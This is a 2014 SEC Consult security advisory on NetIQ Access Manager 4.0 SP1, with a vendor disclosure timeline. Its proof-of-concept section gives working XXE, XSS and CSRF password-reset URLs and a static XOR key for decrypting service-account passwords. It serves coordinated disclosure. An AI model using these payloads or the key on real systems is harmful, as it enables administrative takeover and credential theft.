NetIQ Access Manager 4.0 SP1 XSS / CSRF / XXE Injection / Disclosure

`SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >  
=======================================================================  
title: Multiple high risk vulnerabilities  
product: NetIQ Access Manager  
vulnerable version: 4.0 SP1  
fixed version: 4.0 SP1 Hot Fix 3  
CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,  
CVE-2014-5217  
impact: High  
homepage: https://www.netiq.com/  
found: 2014-10-29  
by: W. Ettlinger  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
"As demands for secure web access expand and delivery becomes increasingly  
complex, organizations face some formidable challenges. Access Manager  
provides a simple yet secure and scalable solution that can handle all your  
web access needs—both internal as well as in the cloud."  
  
URL: https://www.netiq.com/products/access-manager/  
  
  
Business recommendation:  
------------------------  
An attacker without an account on the NetIQ Access Manager is be able to gain  
administrative access by combining different attack vectors. Though this host  
may not always be accessible from a public network, an attacker is still able  
to compromise the system when directly targeting administrative users.  
  
Because the NetIQ Access Manager is used for authentication, an attacker  
compromising the system can use it to gain access to other systems.  
  
SEC Consult highly recommends that this software is not used until a full  
security review has been performed and all issues have been resolved.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)  
Authenticated administrative users can download arbitrary files from the Access  
Manager administration interface as the user "novlwww".  
  
The vendor provided the following KB link:  
https://www.novell.com/support/kb/doc.php?id=7015993  
  
  
2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)  
Multiple reflected cross site scripting vulnerabilities were found. These  
allow effective attacks of administrative and SSLVPN sessions.  
  
The vendor provided the following KB link:  
https://www.novell.com/support/kb/doc.php?id=7015994  
  
  
3) Persistent Site Scripting (XSS, CVE-2014-5216)  
A persistent cross site scripting vulnerability was found. This allows  
effective attacks of administrative and SSLVPN sessions.  
  
The vendor provided the following KB link:  
https://www.novell.com/support/kb/doc.php?id=7015996  
  
  
4) Cross Site Request Forgery (CVE-2014-5217)  
The Access Manager administration interface does not have CSRF protection.  
  
The vendor provided the following KB link:  
https://www.novell.com/support/kb/doc.php?id=7015997  
  
  
5) Information Disclosure (CVE-2014-5215)  
Authenticated users of the administration interface can gain authentication  
information of internal administrative users.  
  
The vendor provided the following KB link:  
https://www.novell.com/support/kb/doc.php?id=7015995  
  
  
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an  
unauthenticated, non-admin user may gain full access to the system!  
  
  
Proof of concept:  
-----------------  
1) XML eXternal Entity Injection (XXE)  
As an example, the following URL demonstrates the retrieval of the /etc/passwd  
file as an authenticated administrative user:  
  
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>  
  
  
2) Reflected Cross Site Scripting (XSS)  
The following URLs demonstrate different reflected XSS flaws in the  
administration interface and the user interface.  
  
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'  
  
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E  
  
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
  
3) Persistent Site Scripting (XSS)  
The following URL injects a stored script on the auditing page:  
  
https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289  
  
  
4) Cross Site Request Forgery  
As an example, an attacker is able to change the administration password to  
'12345' by issuing a GET request in the context of an authenticated  
administrator. The old password is not necessary for this attack!  
  
https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345  
  
  
5) Information Disclosure  
The following URLs disclose several useful information to an authenticated  
account:  
  
https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp  
https://<host>:8443/roma/jsp/debug/debug.jsp  
  
The disclosed system properties:  
com.volera.vcdn.monitor.password  
com.volera.vcdn.alert.password  
com.volera.vcdn.sync.password  
com.volera.vcdn.scheduler.password  
com.volera.vcdn.publisher.password  
com.volera.vcdn.application.sc.scheduler.password  
com.volera.vcdn.health.password  
  
The static string "k~jd)*L2;93=Gjs" is XORed with these values in order  
to decrypt passwords of internally used service accounts.  
  
  
  
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an  
unauthenticated, non-admin user may gain full access to the system!  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in the NetIQ Access Manager  
version 4.0 SP1, which was the most recent version at the time of discovery.  
  
  
Vendor contact timeline:  
------------------------  
2014-10-29: Contacting [email protected], sending responsible disclosure  
policy and PGP keys  
2014-10-29: Vendor redirects to [email protected], providing PGP keys  
through Novell support page  
2014-10-30: Sending encrypted security advisory to Novell  
2014-10-30: Novell acknowledges the receipt of the advisory  
2014-12-16: Novell: the vulnerability fixes will be released tomorrow;  
The CSRF vulnerability will not be fixed immediately  
("Since this can be done only after an authorized login");  
two XSS vulnerabilities can not be exploited ("We could not  
take advantage or retrieve any cookie info on the server  
side - it looks like it's a client side cross scripting  
attack.")  
2014-12-16: Explaining why those vulnerabilities can be exploited  
2014-12-17: Novell: Fix will be released tomorrow  
2014-12-17: Verifying release of advisory tomorrow  
2014-12-18: Novell: Advisory can be released  
2014-12-18: Coordinated release of security advisory  
  
  
Solution:  
---------  
Update to the latest available of Access Manager and implement workarounds  
mentioned in the KB articles by Novell linked above.  
  
  
Workaround:  
-----------  
For some vulnerabilities, Novell provides best practice recommendations in the  
URLs linked above.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested to work with the experts of SEC Consult?  
Write to [email protected]  
  
EOF W. Ettlinger / @2014  
  
`